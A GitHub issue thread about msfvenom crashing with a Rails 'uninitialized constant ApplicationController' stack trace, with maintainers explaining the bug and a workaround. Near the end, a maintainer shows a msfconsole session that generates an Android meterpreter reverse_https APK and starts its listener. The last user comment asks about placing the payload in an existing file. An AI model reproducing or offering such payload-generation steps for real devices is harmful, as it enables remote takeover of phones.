### ISSUE TITLE
metasploit broken 

### ISSUE THREAD

**Issue by oussamagtp** [rapid7/metasploit-framework#9035]
i tried to run metasploit v 4.16.8-dev on my ubuntu 17.04 and i had a weird message as you can see here and in the pic 
```
 /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/wicked-0.5.0/app/controllers/wicked/wizard_controller.rb:5:in `<top (required)>': uninitialized constant ApplicationController (NameError)
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/engine.rb:472:in `block (2 levels) in eager_load!'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/engine.rb:471:in `each'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/engine.rb:471:in `block in eager_load!'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/engine.rb:469:in `each'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/engine.rb:469:in `eager_load!'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/engine.rb:346:in `eager_load!'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/application/finisher.rb:56:in `each'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/application/finisher.rb:56:in `block in <module:Finisher>'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/initializable.rb:30:in `instance_exec'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/initializable.rb:30:in `run'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/initializable.rb:55:in `block in run_initializers'
	from /opt/metasploit/ruby/lib/ruby/2.3.0/tsort.rb:228:in `block in tsort_each'
	from /opt/metasploit/ruby/lib/ruby/2.3.0/tsort.rb:350:in `block (2 levels) in each_strongly_connected_component'
	from /opt/metasploit/ruby/lib/ruby/2.3.0/tsort.rb:431:in `each_strongly_connected_component_from'
	from /opt/metasploit/ruby/lib/ruby/2.3.0/tsort.rb:349:in `block in each_strongly_connected_component'
	from /opt/metasploit/ruby/lib/ruby/2.3.0/tsort.rb:347:in `each'
	from /opt/metasploit/ruby/lib/ruby/2.3.0/tsort.rb:347:in `call'
	from /opt/metasploit/ruby/lib/ruby/2.3.0/tsort.rb:347:in `each_strongly_connected_component'
	from /opt/metasploit/ruby/lib/ruby/2.3.0/tsort.rb:226:in `tsort_each'
	from /opt/metasploit/ruby/lib/ruby/2.3.0/tsort.rb:205:in `tsort_each'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/initializable.rb:54:in `run_initializers'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/application.rb:352:in `initialize!'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/railtie.rb:194:in `public_send'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.9/lib/rails/railtie.rb:194:in `method_missing'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.8/config/environment.rb:5:in `<top (required)>'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.8/lib/msfenv.rb:18:in `require'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.8/lib/msfenv.rb:18:in `<top (required)>'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.8/msfvenom:10:in `require'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.8/msfvenom:10:in `<top (required)>'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom:23:in `load'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom:23:in `<main>'
```
![screenshot from 2017-10-02 13-09-42](https://user-images.githubusercontent.com/32412605/31076623-63c5733e-a77b-11e7-8127-288b8f3036c7.png)

**Comment by Pushpamk** [comment]
I think you are missing ApplicationController.Make sure that there is file name "application_controller.rb".
This file look something like this 

class ApplicationController < ActionController::Base
  protect_from_forgery
end

**Comment by sempervictus** [comment]
Markup syntax, please, that makes the stacktrace legible.
This... shouldn't happen. @busterb: looks like venom is pulling in way more than in should on full installs...

**Comment by timwr** [comment]
You can't run msfvenom from with msfconsole (yet). Fix is here: https://github.com/rapid7/metasploit-framework/pull/8999

**Comment by yf007** [comment]
Hey
The problem was still the same
Same error message as above

**Comment by busterb** [comment]
I'd still recommend not running 'msfvenom' from within msfconsole. There are much better and faster ways to generate a payload from within msfconsole.

**Comment by busterb** [comment]
Note that the fix for this never got landed. Hmm....

**Comment by yf007** [comment]
There are much better and faster ways to generate a payload from within msfconsole.???

**Comment by busterb** [comment]
Yes, type 'use payloads...' with the payload you want.
Then use the `generate` command. See `generate -h` for details.

This is much faster because it doesn't have to start framework from scratch each time. You can also use the 'to_handler' function to launch a listener directly from the payload context.

**Comment by yf007** [comment]
What about Android?

**Comment by busterb** [comment]
Sure:

```
msf5 > use payload/android/meterpreter/reverse_https 
msf5 payload(android/meterpreter/reverse_https) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 payload(android/meterpreter/reverse_https) > generate -f test.apk
[*] Writing 353735 bytes to test.apk...
msf5 payload(android/meterpreter/reverse_https) > to_handler 
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf5 payload(android/meterpreter/reverse_https) > [*] Started HTTPS reverse handler on https://127.0.0.1:8443
```

**Comment by yf007** [comment]
Thank you
And if I want to put it in a dedicated file that is already ready?
